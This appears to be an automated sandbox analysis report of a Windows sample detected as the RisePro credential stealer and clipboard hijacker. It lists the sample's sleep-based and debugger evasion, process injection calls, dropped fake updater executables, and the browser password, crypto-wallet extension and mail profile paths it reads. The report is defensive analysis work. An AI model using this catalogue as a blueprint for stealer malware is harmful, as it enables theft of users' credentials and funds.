Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5512 Thread sleep time: -882000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -8126000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5512 Thread sleep time: -2028000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5576 Thread sleep time: -437000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 6972 Thread sleep count: 9995 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 6972 Thread sleep time: -2248875s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07142EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_07142EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715CCFD FindFirstFileExW, 0_2_0715CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_0710B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_0710BAC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07166276 VirtualQuery,GetSystemInfo, 0_2_07166276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000 Jump to behavior
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696428(
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696428(
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000CuijjqDE5gAdZQ0/uE
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696H
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,11696428658
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,116964288
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: file.exe, 00000000.00000003.2052092482.00000000016C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}i
Source: file.exe, 00000000.00000002.4492597224.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: file.exe, 00000000.00000002.4492597224.00000000016C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_80E7E91F
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696428655~
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428650
Source: file.exe, 00000000.00000002.4492597224.00000000016B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.4494288913.00000000066CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_di
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696428655o
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696428655o
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}les(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERD
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696428655
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2108857833.0000000006645000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2107514703.0000000006641000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,11696428658
Source: Ok36VMDQZkJbWeb Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\hcMSmyGUCSEFc2FAKlzc.exe
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00CBA212 rdtsc 0_2_00CBA212
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0713E580 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_0713E580
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BAB380 WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00BAB380
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710E3B5 GetHGlobalFromStream,GlobalSize,GlobalLock,VirtualAlloc,RtlGetCompressionWorkSpaceSize,RtlCompressBuffer,GlobalUnlock,GdipDisposeImage,GetProcessHeap,HeapAlloc, 0_2_0710E3B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_071462B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_071462B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07146014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_07146014
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0714FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0714FC07
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe "C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07145D6C cpuid 0_2_07145D6C
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_07160227
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_071602FD
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_07160121
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_07142CC6
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_07154ADB
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_07155047
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0715FFF8
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FD1A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0715FDA5
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FC34
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0715FC7F
Source: C:\Users\user\Desktop\file.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_0715F988
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AFDEAD GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00AFDEAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0712C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_0712C990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 21.2.hcMSmyGUCSEFc2FAKlzc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.zy4GXi5yvCrsiS0ulH8Z.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected RisePro Stealer
Source: Yara match File source: 00000000.00000003.2116356968.0000000006588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Xfp4MT9n1IFhi1hjXC4bx59.zip, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 00000000.00000003.2116356968.0000000006588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4493848204.0000000006306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Xfp4MT9n1IFhi1hjXC4bx59.zip, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
